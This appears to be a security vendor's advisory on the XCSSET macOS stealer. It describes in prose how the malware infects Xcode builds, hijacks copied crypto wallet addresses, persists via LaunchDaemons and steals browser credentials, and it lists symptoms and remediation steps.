XCSSET is a macOS information stealer that targets developers by infecting Xcode projects and executing malicious scripts during the build process. It is designed to collect browser credentials, clipboard data, and other sensitive information, and includes persistence mechanisms to maintain access on affected devices.

Symptoms

You might observe the following artifacts associated with this threat:

• Infection of Xcode project files that results in malicious build phases or injected shell commands.
• Unexpected execution of AppleScript via osascript or run-only compiled script modules during builds.
• Presence of LaunchDaemon entries or hidden persistence components maintaining execution across system restarts.  
• Altered clipboard behavior, particularly unexpected replacement of copied cryptocurrency wallet addresses.
• Evidence of exfiltration activity or unexpected network connections associated with AppleScript or obfuscated payload downloads.

Technical Breakdown

XCSSET is a sophisticated modular malware family that primarily targets developers by injecting malicious content into Xcode projects. When an infected project is built on macOS, the malware executes its payload through obfuscated shell and AppleScript modules, leveraging legitimate developer tooling to evade casual detection.

The infection chain typically consists of multiple stages, with an initial loader that fetches additional scripts and payloads from a command and control (C2) server. These downloaded components are often delivered as run-only compiled AppleScripts, which are difficult to decompile.

The latest variants expand XCSSET’s capabilities with new modules and behaviors. A clipboard hijacking submodule monitors the user’s clipboard for cryptocurrency wallet address patterns and replaces them with attacker-controlled addresses when a match is detected.

Another significant module introduces LaunchDaemon-based persistence. This mechanism creates a disguised persistence entry that executes malware components whenever the system launches, including when a fake application designed to resemble a legitimate macOS system component is launched.

XCSSET also includes stealer modules that target multiple browsers. A compiled binary, often derived from modified open-source tools like HackBrowserData, is downloaded and executed to extract saved credentials, cookies, history, and autofill information from browsers such as Firefox.

Throughout its execution, XCSSET uses advanced obfuscation and encryption techniques, including randomized encoding and obfuscated module names, to make static analysis and detection more difficult.

Next Steps

Iru Endpoint Detection & Response (EDR) can detect anomalous behavior associated with XCSSET, including obfuscated script execution, unauthorized clipboard manipulation, and modification of LaunchDaemon entries when file monitoring and behavioral protections are enabled.

If XCSSET activity is suspected on a device, carefully inspect Xcode project files for unauthorized build phase modifications or injected commands, and remove any suspicious components. Investigate any unusual persistent processes, LaunchDaemon plists, or automatic script execution triggers. Rotate credentials stored in browsers and ensure that sensitive wallet addresses and tokens have not been compromised.

In the future, only open and build Xcode projects from trusted and verified sources. Be cautious when handling sensitive data in the clipboard, and verify that pasted content is accurate before use. Keep macOS and all development tools updated to the latest security releases to reduce the threat surface.